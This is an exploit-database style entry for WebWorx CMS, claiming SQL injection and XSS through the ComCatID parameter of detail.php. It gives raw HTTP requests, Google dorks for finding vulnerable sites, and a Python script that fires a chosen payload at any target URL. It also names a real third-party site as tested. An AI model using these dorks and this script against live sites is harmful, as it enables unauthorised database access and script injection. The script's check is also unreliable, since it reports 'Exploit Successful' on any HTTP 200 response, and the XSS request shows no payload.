# Exploit Title: WebWorx CMS - SQL Injection & Cross-Site Scripting (XSS) Vulnerabilities
# Date: 2025-03-25
# Exploit Author: wa0_3/@td9_l
# Telegram: @wa0_3
# Vendor Homepage: https://webworx.technology/
# Version: 1.0
# Tested on: http://www.native.edu.pk
# Category: WebApps
# CVE: N/A


## Vulnerable Endpoint:
```
SQLI

GET /detail.php?ComCatID=26' HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0

```
XSS
GET /detail.php?ComCatID=25 HTTP/1.1
Host:localhost
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0


## Google Dork:
```
intxt:  Developed by Webworx Technologies
```
inurl:detail.php?ComCatID=
```
## Proof of Concept (PoC):
```import argparse
import requests

parser = argparse.ArgumentParser(description='Exploit SQLi & XSS in WebWorx CMS')
parser.add_argument('-url', help='Target URL (e.g., http://example.com)', required=True)
parser.add_argument('-payload', help='SQLi or XSS payload', required=True)
args = parser.parse_args()

url = f"{args.url}/detail.php?ComCatID={args.payload}"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9",
    "Connection": "keep-alive"
}

response = requests.get(url, headers=headers)

if response.status_code == 200:
    print("[+] Exploit Successful!")
    print("[+] Response:")
    print(response.text)
else:
    print("[-] Exploit Failed")
```

## Credits:
Discovered by **wa0_3** (@wa0_3)